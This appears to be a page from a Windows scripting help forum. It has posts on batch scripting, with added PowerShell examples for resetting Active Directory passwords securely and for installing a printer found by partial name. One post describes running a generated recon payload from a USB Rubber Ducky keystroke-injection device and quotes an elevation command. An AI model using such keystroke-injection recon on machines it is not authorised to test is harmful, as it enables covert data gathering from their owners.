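The batch script above draws its password characters from cmd's %RANDOM%, a 15-bit generator seeded from the clock, and "byte mod alphabet length" style selection favours the first characters of the alphabet. The PowerShell below is an added example (not the poster's script) that does the same job with a cryptographic RNG and rejection sampling, then resets the account through the ActiveDirectory module instead of dsmod. It assumes RSAT's ActiveDirectory module is installed and that the caller has reset rights; the OU and DC values are the same placeholders used in the batch file.

```powershell
# Added example, not the poster's script. Assumes the ActiveDirectory module (RSAT)
# and reset rights on the target account. OU/DC components are placeholders.

function New-RandomAlphanumericPassword {
    param([int]$Length = 10)

    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    # Largest multiple of the alphabet size that fits in one byte: 62 * 4 = 248.
    # Bytes at or above this value are discarded (rejection sampling), so every
    # character is equally likely; a plain "byte mod 62" would favour the first
    # 8 characters because 256 is not a multiple of 62.
    $limit = [int][math]::Floor(256 / $alphabet.Length) * $alphabet.Length

    $rng   = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $buf   = New-Object byte[] 1
    $chars = New-Object char[] $Length
    $i = 0
    while ($i -lt $Length) {
        $rng.GetBytes($buf)
        if ($buf[0] -lt $limit) {
            $chars[$i] = $alphabet[$buf[0] % $alphabet.Length]
            $i++
        }
    }
    $rng.Dispose()
    return -join $chars
}

function Reset-UserPasswordByName {
    param(
        [Parameter(Mandatory)][string]$DisplayName,
        [int]$Length = 10
    )
    # Same DN shape as the batch script; replace the placeholders for your domain.
    $dn     = "CN=$DisplayName,OU=[OU],DC=[DC],DC=co,DC=uk"
    $plain  = New-RandomAlphanumericPassword -Length $Length
    $secure = ConvertTo-SecureString -String $plain -AsPlainText -Force

    # -ErrorAction Stop makes a failed reset throw instead of silently continuing,
    # which is the check the batch script's "IF ERRORLEVEL 0" was meant to perform.
    Set-ADAccountPassword -Identity $dn -Reset -NewPassword $secure -ErrorAction Stop

    # The batch script passes "-mustchpwd no". Forcing a change at next logon turns
    # the value sent by email into a one-time secret rather than a standing password.
    Set-ADUser -Identity $dn -ChangePasswordAtLogon $true -ErrorAction Stop

    return $plain
}

# Usage:
#   $pw = Reset-UserPasswordByName -DisplayName 'Jane Doe'
#   (hand $pw to whatever notification step you use; it is returned only to the caller)
```

The function returns the plaintext to the caller rather than building a mailto: URL, so how the value reaches the user is a separate decision; with ChangePasswordAtLogon set, whatever is sent stops working after the first logon.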
  24. Hi all, So I placed the following script on my Rubber Ducky, as inject.bin (next post). I used the Payload Generator located here. I chose all Recon apart from Screen Capture, and Reporting as 'Save Files to USB Drive'. I plugged it in to a Windows 7 machine, with the machine being on the Desktop and not locked. It proceeded to do nothing for a while, then it opened a random image file I happened to have on my Desktop and zoomed in and out on it a few times. Then silence. I plugged in my USB, named 'HELLOWORLD', gave it a few minutes and then unplugged. The USB had nothing on it, which wasn't right. It failed to gather any information at all. Is there a way I can debug the script? As in, get it to tell me exactly what it's doing, as it does it, on-screen? Or maybe you have an idea of what went wrong?

      *NOTE* This bit at the start...

      STRING powershell Start-Process notepad -Verb runAs

      ... didn't open notepad. Notepad failed to open at any point. Cheers.
  25. Hello all, Sorry to ask another CMD/Batch question, I'm still learning and having way too much fun ;) I'm trying to add a printer using...

      rundll32.exe printui.dll,PrintUIEntry /in /n "\\servername\Printer Name"

      ... which works great IF you know the full name of the printer you are trying to add. If I use Windows 7's Control Panel > Devices & Printers to add a printer, I can select Add A Printer > Add A Network Printer > The Printer I Want Isn't Listed > Find a printer in the directory, and then type in a small section of the printer's name and it will find it. For example, one of our printers is called 'Q123 HP LJ MFP M880 on SERVERNAME' but I can find it by simply typing in Q123. Is there a way that I can get the batch command to add the printer using something like...

      rundll32.exe printui.dll,PrintUIEntry /in /n "Q123"

      ... and get the system to do the same kind of search it would do if I went through the control panel (automatically search our print server for a name like 'Q123' and install it)? I have trawled the internet for a while looking for this info, but was unsuccessful in finding anything that didn't state to input the full name of the printer. Thank you in advance. *edit* Amended grammar/spelling.
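The "Find a printer in the directory" dialog in the question is searching Active Directory for printQueue objects. The PowerShell below is an added example (not the poster's command) that does that lookup by partial name and then installs the result with the same printui call the question uses. It assumes RSAT's ActiveDirectory module is installed and that the print server publishes its queues to AD; 'Q123' is the sample name from the question.

```powershell
# Added example, not the poster's command. Assumes the ActiveDirectory module (RSAT)
# and a print server that publishes its queues ("List in the directory") to AD.

function Find-PublishedPrinter {
    param([Parameter(Mandatory)][string]$NamePart)

    # Escape the RFC 4515 special characters so user input cannot widen the filter
    # (a bare "*" would match every published printer in the domain).
    $escaped = $NamePart -replace '\\', '\5c' -replace '\*', '\2a' -replace '\(', '\28' -replace '\)', '\29'

    # printQueue objects carry printerName (the share/display name), uNCName (\\server\share)
    # and serverName (the publishing print server).
    $filter = "(&(objectClass=printQueue)(printerName=*$escaped*))"
    Get-ADObject -LDAPFilter $filter -Properties printerName, uNCName, serverName |
        Select-Object printerName, uNCName, serverName
}

function Install-PublishedPrinter {
    param([Parameter(Mandatory)][string]$NamePart)

    $hits = @(Find-PublishedPrinter -NamePart $NamePart)
    if ($hits.Count -eq 0) {
        throw "No published printer matches '$NamePart'"
    }
    if ($hits.Count -gt 1) {
        # Same situation as the Control Panel search returning several rows:
        # show them and ask for a narrower name rather than guessing.
        $hits | Format-Table -AutoSize | Out-String | Write-Host
        throw "More than one printer matches '$NamePart'; refine the search"
    }

    $unc = $hits[0].uNCName
    # Same per-user connection the question's command creates, now with the full UNC name.
    rundll32.exe printui.dll,PrintUIEntry /in /n $unc
    return $unc
}

# Usage:
#   Install-PublishedPrinter -NamePart 'Q123'
```

Run it as the user who should get the connection, since /in creates a per-user printer connection just as the original rundll32 line does.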